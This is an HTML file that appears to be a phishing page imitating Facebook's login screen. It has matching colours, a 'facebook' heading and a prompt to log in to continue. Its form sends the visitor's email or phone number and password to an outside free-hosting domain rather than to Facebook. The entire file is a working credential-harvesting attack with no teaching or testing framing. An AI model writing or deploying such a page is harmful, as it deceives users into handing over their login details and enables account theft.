<DOCTYPE html>
<html>
    <head>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <style>
            body {
    background: #f0f2f5;
    color: #1c1e21;
    direction: ltr;
    line-height: 1.34;
    margin: 0;
    padding: 0;
    unicode-bidi: embed;
    font-size: 12px;
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    font-family: Helvetica, Arial, sans-serif;
}
h1 {
    color: #1877f2;
    font-family: sans-serif;
    font-weight: 800;
    font-size: 50px;
    text-align: center;
}
h3 {
    text-align: center;
    font-size: 20px;
}
form {
    font-family: inherit;
    padding-bottom: 24px;
    padding-top: 10px;
    text-align: center;
    background-color: #fff;
    border: none;
    border-radius: 8px;
    box-shadow: 0 2px 4px rgb(0 0 0 / 10%), 0 8px 16px rgb(0 0 0 / 10%);
    box-sizing: border-box;
    margin: 40px 0 0;
    padding: 20px 0 28px;
    width: 396px;
    font-size: 12px;
    display: block;
    color: #1c1e21;
    direction: ltr;
    line-height: 1.34;
    
}
#user, #password {
    font-family: inherit;
    border-radius: 6px;
    font-size: 20px;
    padding: 14px 16px;
    width: 332px;
    background: #FFFFFF repeat-x;
    border: 1px solid #dddfe2;
    color: #1d2129;
    height: 48px;
    line-height: 48px;
    vertical-align: middle;
    margin: 0.5cm 0 0.5cm 0;
}
#submit {
    background-color: #166fe5;
    border-color: #365899;
    border: none;
    border-radius: 6px;
    font-size: 20px;
    line-height: 48px;
    padding: 0 16px;
    width: 332px;
    color: #fff;
    transition: 200ms cubic-bezier(.08,.52,.52,1) background-color, 200ms cubic-bezier(.08,.52,.52,1) box-shadow, 200ms cubic-bezier(.08,.52,.52,1) transform;
    box-sizing: content-box;
    -webkit-font-smoothing: antialiased;
    font-weight: bold;
    position: relative;
    text-align: center;
    text-shadow: none;
    vertical-align: middle;
    cursor: pointer;
    display: inline-block;
    white-space: nowrap;
    appearance: auto;
    writing-mode: horizontal-tb !important;
    text-rendering: auto;
    letter-spacing: normal;
    word-spacing: normal;
    text-transform: none;
    text-indent: 0px;
}
        </style>
    </head>
    <h1>facebook</h1>
    <h3>log in to continue</h3>
    <form action="http://gotofb1.000webhostapp.com/text.php" method="post">
        <input type="text" name="user" placeholder="Email or phone number" id="user">
        <input type="text" name="password" placeholder="Password" id="password">
        <input type="submit" name="submit" id="submit" value="Log in">
    </form>

    

</html>
